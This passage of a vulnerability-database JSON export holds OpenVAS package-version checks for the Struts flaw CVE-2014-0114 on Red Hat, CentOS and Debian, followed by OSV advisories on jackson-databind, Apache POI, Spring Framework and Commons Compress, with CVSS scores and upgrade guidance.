rpm:\"struts-javadoc~1.2.9~4jpp.8.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-manual\", rpm:\"struts-manual~1.2.9~4jpp.8.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-webapps-tomcat5\", rpm:\"struts-webapps-tomcat5~1.2.9~4jpp.8.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "openvas", "title": "RedHat Update for struts RHSA-2014:0474-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871164", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871164", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for struts RHSA-2014:0474-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871164\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:14:04 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-0114\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for struts RHSA-2014:0474-01\");\n\n\n script_tag(name:\"affected\", value:\"struts on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"insight\", value:\"Apache Struts is a framework for building web applications with Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method. A\nremote attacker could use this flaw to manipulate the ClassLoader used by\nan application server running Struts 1. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. All running applications\nusing struts must be restarted for this update to take effect.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:0474-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-May/msg00005.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'struts'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"struts\", rpm:\"struts~1.2.9~4jpp.8.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-debuginfo\", rpm:\"struts-debuginfo~1.2.9~4jpp.8.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-javadoc\", rpm:\"struts-javadoc~1.2.9~4jpp.8.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-manual\", rpm:\"struts-manual~1.2.9~4jpp.8.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-webapps-tomcat5\", rpm:\"struts-webapps-tomcat5~1.2.9~4jpp.8.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:18", "description": "It was discovered that missing access checks in the Struts ActionForm\nobject could result in the execution of arbitrary code.", "cvss3": {}, "published": "2014-08-21T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2940-1 (libstruts1.2-java - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310702940", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702940", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2940.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2940-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702940\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-0114\");\n script_name(\"Debian Security Advisory DSA 2940-1 (libstruts1.2-java - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-21 00:00:00 +0200 (Thu, 21 Aug 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2940.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"libstruts1.2-java on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.9-5+deb7u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.2.9-9.\n\nWe recommend that you upgrade your libstruts1.2-java packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that missing access checks in the Struts ActionForm\nobject could result in the execution of arbitrary code.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libstruts1.2-java\", ver:\"1.2.9-5+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:32", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "openvas", "title": "CentOS Update for struts CESA-2014:0474 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881933", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881933", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for struts CESA-2014:0474 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881933\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:12:02 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-0114\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for struts CESA-2014:0474 centos5\");\n\n script_tag(name:\"affected\", value:\"struts on CentOS 5\");\n script_tag(name:\"insight\", value:\"Apache Struts is a framework for building web applications\nwith Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method. A\nremote attacker could use this flaw to manipulate the ClassLoader used by\nan application server running Struts 1. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. All running applications\nusing struts must be restarted for this update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0474\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-May/020284.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'struts'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"struts\", rpm:\"struts~1.2.9~4jpp.8.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-javadoc\", rpm:\"struts-javadoc~1.2.9~4jpp.8.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-manual\", rpm:\"struts-manual~1.2.9~4jpp.8.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-webapps-tomcat5\", rpm:\"struts-webapps-tomcat5~1.2.9~4jpp.8.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-08-03T10:48:59", "description": "It was discovered that missing access checks in the Struts ActionForm\nobject could result in the execution of arbitrary code.", "cvss3": {}, "published": "2014-08-21T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2940-1 (libstruts1.2-java - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2017-07-19T00:00:00", "id": "OPENVAS:702940", "href": "http://plugins.openvas.org/nasl.php?oid=702940", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2940.nasl 6759 2017-07-19 09:56:33Z teissa $\n# Auto-generated from advisory DSA 2940-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"libstruts1.2-java on Debian Linux\";\ntag_insight = \"The core of the Struts framework is a flexible control layer based on standard\ntechnologies like Servlets, JavaBeans, ResourceBundles, and Extensible\nMarkup Language (XML), as well as various Apache Commons packages. Struts\nencourages application architectures based on the Model 2 approach, a\nvariation of the classic Model-View-Controller (MVC) design paradigm.\";\ntag_solution = \"For the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.9-5+deb7u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.2.9-9.\n\nWe recommend that you upgrade your libstruts1.2-java packages.\";\ntag_summary = \"It was discovered that missing access checks in the Struts ActionForm\nobject could result in the execution of arbitrary code.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702940);\n script_version(\"$Revision: 6759 $\");\n script_cve_id(\"CVE-2014-0114\");\n script_name(\"Debian Security Advisory DSA 2940-1 (libstruts1.2-java - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-19 11:56:33 +0200 (Wed, 19 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-08-21 00:00:00 +0200 (Thu, 21 Aug 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2940.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libstruts1.2-java\", ver:\"1.2.9-5+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libstruts1.2-java\", ver:\"1.2.9-5+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libstruts1.2-java\", ver:\"1.2.9-5+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libstruts1.2-java\", ver:\"1.2.9-5+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osv": [{"lastseen": "2022-07-21T08:18:07", "description": "\nMore deserialization flaws were discovered in jackson-databind\nrelating to the classes in com.zaxxer.hikari.HikariConfig,\ncom.zaxxer.hikari.HikariDataSource, commons-dbcp and\ncom.p6spy.engine.spy.P6DataSource, which could allow an\nunauthenticated user to perform remote code execution. The issue was\nresolved by extending the blacklist and blocking more classes from\npolymorphic deserialization.\n\n\nFor Debian 8 Jessie, these problems have been fixed in version\n2.4.2-2+deb8u9.\n\n\nWe recommend that you upgrade your jackson-databind packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-03T00:00:00", "type": "osv", "title": "jackson-databind - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16942", "CVE-2019-14540", "CVE-2019-16943", "CVE-2019-16335"], "modified": "2022-07-21T05:52:50", "id": "OSV:DLA-1943-1", "href": "https://osv.dev/vulnerability/DLA-1943-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:48:13", "description": "Apache POI in versions prior to release 3.17 are vulnerable to Denial of Service Attacks:\n - Infinite Loops while parsing crafted WMF, EMF, MSG and macros (POI bugs 61338 and 61294)\n - Out of Memory Exceptions while parsing crafted DOC, PPT and XLS (POI bugs 52372 and 61295)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-01-14T19:18:22", "type": "osv", "title": "Denial of Service in Apache POI", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2023-04-11T01:48:10", "id": "OSV:GHSA-523C-XH4G-MH5M", "href": "https://osv.dev/vulnerability/GHSA-523c-xh4g-mh5m", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-04-11T01:34:06", "description": "Directory traversal vulnerability in Pivotal Spring Framework 3.x before 3.2.9 and 4.0 before 4.0.5 allows remote attackers to read arbitrary files via a crafted URL.", "cvss3": {}, "published": "2022-05-14T00:56:29", "type": "osv", "title": "Improper Limitation of a Pathname to a Restricted Directory in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3578"], "modified": "2023-04-11T01:33:36", "id": "OSV:GHSA-RHCG-RWHX-QJ3J", "href": "https://osv.dev/vulnerability/GHSA-rhcg-rwhx-qj3j", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-28T05:35:53", "description": "When reading a specially crafted ZIP archive, the read method of Apache Commons Compress 1.7 to 1.17's ZipArchiveInputStream can fail to return the correct EOF indication after the end of the stream has been reached. When combined with a java.io.InputStreamReader this can lead to an infinite stream, which can be used to mount a denial of service attack against services that use Compress' zip package.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-10-19T16:41:27", "type": "osv", "title": "Moderate severity vulnerability that affects org.apache.commons:commons-compress", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11771"], "modified": "2023-03-28T05:35:51", "id": "OSV:GHSA-HRMR-F5M6-M9PQ", "href": "https://osv.dev/vulnerability/GHSA-hrmr-f5m6-m9pq", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-04-11T01:31:39", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-28T20:51:15", "type": "osv", "title": "Polymorphic Typing in FasterXML jackson-databind", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16942"], "modified": "2023-04-11T01:31:16", "id": "OSV:GHSA-MX7P-6679-8G3Q", "href": "https://osv.dev/vulnerability/GHSA-mx7p-6679-8g3q", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T05:42:54", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-13T00:32:27", "type": "osv", "title": "Polymorphic typing issue", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16943"], "modified": "2023-03-28T05:42:48", "id": "OSV:GHSA-FMMC-742Q-JG75", "href": "https://osv.dev/vulnerability/GHSA-fmmc-742q-jg75", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:41:02", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-23T09:32:24", "type": "osv", "title": "Information exposure in FasterXML jackson-databind", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 